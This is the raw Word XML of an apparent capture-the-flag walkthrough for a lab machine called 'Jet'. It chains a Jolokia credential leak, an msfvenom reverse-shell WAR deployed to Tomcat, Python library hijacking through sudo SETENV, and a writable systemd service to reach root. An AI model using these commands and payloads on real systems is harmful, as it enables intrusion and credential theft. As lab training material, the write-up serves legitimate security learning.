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JET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x9br56qln2f"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two open web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8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Now, we will focus our attention on the web service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7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just an HTML template. Now, we will proceed to inspect the web service on port 8080.</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67100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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searching for exploits for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat version 9.0.58</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we did not identify any vulnerabilities. Attempts to log into Tomcat using default credentials such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tomcat:tomcat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> were unsuccessful.</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scenario, another approach we can consider is performing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fuzzing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find potentially relevant files or directories. While fuzzing with the wordlist </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">spring-boot.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified a file of interest named </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“jolokia”</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7y0tdxr77nqr"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717800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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4wn1gnt6hlq" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Jolokia?</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Jolokia is a tool that facilitates the exposure of remote management information and operations for Java applications. It is commonly used in environments running Java servers, such as Apache Tomcat. Jolokia allows remote interaction with the Java Virtual Machine (JVM) for monitoring and management, providing an HTTP/JSON interface.</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searching for exploits, I came across the following GitHub repository:</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hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/laluka/jolokia-exploitation-toolkit</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the exploit found in:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">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jolokia-exploitation-toolkit/exploits/info-leak-tomcat-creds.py</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obtain the Tomcat access credentials.</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could also perform the process manually by sending a GET request to the endpoint:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001D">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/jolokia/read/Users:database=UserDatabase,type=User,username=%22tomcat%22/password</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6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credentials in hand, we successfully accessed the Tomcat console.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6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access to the Tomcat console, we can create a</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.war</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file containing a reverse shell in order to obtain a shell on the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000022">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msfvenom -p java/shell_reverse_tcp LHOST=&lt;LHOST_IP&gt; LPORT=&lt;LHOST_PORT&gt; -f war -o shell.war</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08100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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651000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we obtained a shell.</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5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mnjtorjgt1a9" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upgrading the simple shell to a fully interactive TTY:</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/python3 /opt/Poc.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snowden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, without needing to enter a password.</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4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relevant observation is the presence of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SETENV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This directive allows a user or group to define environment variables that will be preserved when executing commands with sudo. After researching how to exploit this situation, I found an article about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Library Hijacking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Basically, what we will do is create a malicious library that the code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> poc.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> imports. For example, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">json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 We will create the malicious library in the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directory containing our malicious payload. By using </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SETENV</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we can alter the priority order of imported modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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Linux Privilege Escalation: Python Library Hijacking</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId22">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/</w:t>
        </w:r>
      </w:hyperlink>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000625" cy="1333500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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006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92500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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create our malicious library </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">json.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in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5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sudo -u snowden PYTHONPATH=/tmp/ /usr/bin/python3 /opt/Poc.py </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we obtain a shell as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snowden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73"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user snowden, we retrieve the first flag.</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7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first user flag, it is time to escalate privileges to obtain the final flag. For this, we must escalate to the root user.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/reboot </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as root, without entering a password.</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5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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">systemctl status tomcat, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we identify the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/systemd/system/tomcat.service. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Checking its permissions, we notice that user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snowden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has write permission over it.</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5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information, we can edit this file, changing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">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Group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way, when we execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/sbin/reboot, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tomcat will be executed as the root user.</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6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28829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6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run </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo /sbin/reboot</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0" l="0" r="0" t="0"/>
            <wp:docPr id="6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start the Netcat listener and access our shell file that was previously uploaded to Tomcat.</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4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56"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3225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Now, with a root user shell, we can obtain our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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:jc w:val="both"/>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663700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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F">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o"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0" name="image11.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image1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Jet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hyperlink" Target="https://www.hackingarticles.in/linux-privilege-escalation-python-library-hijacking/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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9.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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image" Target="media/image9.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/laluka/jolokia-exploitation-toolkit" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image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2HMBaaicdC3DnEU+POjUzTFCA==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLnd4OWJyNTZxbG4yZjIOaC43eTB0ZHhyNzducXIyDmguYjR3bjFnbnQ2aGxxMg5oLm1uanRvcmpndDFhOTIOaC4xNzVmNWNzOTR6MG84AHIhMXFjTmNuZ3FDclNtaG9XNWt1c1djQ1d1eFVnbUs5NEpv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